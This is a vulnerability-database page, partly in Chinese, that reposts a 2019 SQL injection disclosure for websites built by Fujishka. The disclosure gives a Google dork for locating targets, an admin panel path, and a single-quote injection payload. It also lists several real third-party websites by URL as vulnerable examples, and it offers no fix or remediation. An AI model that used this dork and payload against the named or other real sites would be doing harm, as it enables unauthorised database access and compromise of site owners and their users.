Created by Fujishka sql injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1559048 漏洞类型
发布时间 2019-04-03 更新时间 2019-04-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040022
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===============================================================
#  Title : Created by Fujishka sql injection Vulnerability
#  Author : Dj3Bb4rAn0n                   Fb.com/djebbar.bassem.16
#  Date : /02/04/2019/
#  Home : Annaba ( Algeria )
#  Tested on : Linux ( backbox )
#  Vendor : http://fujishka.com/
#  Dork : intext:"Created by Fujishka"
===============================================================


         
PoC   : 

                     Admin panel path  :   [ YOUR TARGET ]/admin/

                     Example :   http://greenmountainresorts.in/admin/

        [ + ]  Search in google using this dork :  | intext:"Created by Fujishka" |  or this  dork  :   | "php?id" intext:"Created by Fujishka" |

        [ + ]    payload :   '            Example  :    http://greenmountainresorts.in/room-details.php?id=18'


########################################################################################

Example of vulnerable sites : 

[ + ]     http://indat.co.in/service-details.php?id=11

[ + ]    http://www.newleafedakkara.com/news-details.php?id=18

[ + ]    http://cortexpaincare.com/contreatment-details.php?id=13

[ + ]    http://laptoplab.in/news-details.php?id=23

[ + ]    greenmountainresorts.in/room-details.php?id=18

==========================================================================================


####### Greetz to ########

  Lakarha_23 | mohammed xdz pazzo  | Jag ar